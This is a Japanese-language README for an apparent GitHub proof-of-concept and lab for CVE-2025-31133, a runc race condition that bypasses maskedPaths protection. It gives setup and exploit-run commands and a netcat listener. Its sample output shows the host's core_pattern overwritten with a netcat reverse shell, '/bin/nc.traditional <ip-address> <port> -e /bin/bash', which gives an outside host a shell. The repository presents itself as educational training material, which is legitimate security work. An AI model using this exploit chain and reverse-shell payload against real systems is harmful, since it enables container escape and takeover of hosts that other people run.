
CVE-2025-31133 の概念実証デモンストレーションと学習環境です。これは runc のセキュリティ脆弱性であり、競合状態を利用して maskedPaths 保護をバイパスするものです。maskedPaths は、コンテナが機密性の高いホストファイルシステムパスにアクセスするのを防ぐために設計されています。
https://github.com/user-attachments/assets/d7b4ea43-6cab-4ac5-bb07-08bc46479910
👉 このリポジトリは、Black Hat トレーニングで教えられている研究マインドセットとテクニックの実践的な例です。
このエクスプロイトは、以下の競合状態を利用します:
/proc/sys/kernel/core_pattern)を保護するために maskedPaths で設定されている/dev/null)の削除このリポジトリは教育目的のみです。
git clone https://github.com/C-h4ck-0/Learn-about-cve-2025-31133-poc.git
cd Learn-about-cve-2025-31133-poc
lab-setup.sh スクリプトは以下のことを行います:
chmod +x lab-setup.sh
./lab-setup.sh
脆弱な runc バージョンがインストールされていることを確認してください:
runc --version
バージョン 1.2.0 または類似のものが表示されるはずです。
nc -lnvp <PORT>
chmod +x cve-2025-31133-exploit.sh
./cve-2025-31133-exploit.sh
成功すると、以下のように表示されます:
[*] Compiling race condition exploit binary...
[*] Starting exploit attempts...
[*] Target: /proc/sys/kernel/core_pattern
[*] Backing up /proc/sys/kernel/core_pattern...
[*] Backup created at /tmp/core_pattern.bak
[*] Current content of target:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
====================================================
[*] Testing delay: 5 microseconds
====================================================
X..
[+] ========================================
[+] SUCCESS! Exploit succeeded.
[+] ========================================
[+] Original content:
|/usr/share/apport/apport -p%p -s%s -c%c -d%d -P%P -u%u -g%g -F%F -- %E
------------------------------------------------
[+] Modified content:
|/bin/nc.traditional <ip-address> <port> -e /bin/bash
------------------------------------------------
./exploit.sh: line 148: 7068 Segmentation fault (core dumped) sleep 5
[*] Restoring original content...
[*] Restoration complete.
リバースシェル接続がリスナーに確立されるはずです。
core_pattern を自動的に復元しますこのプロジェクトは教育目的で提供されています。責任を持って倫理的に使用してください。
覚えておいてください: セキュリティ研究ツールは常に責任を持って、自分が所有するかテストの明示的な許可がある環境でのみ使用してください。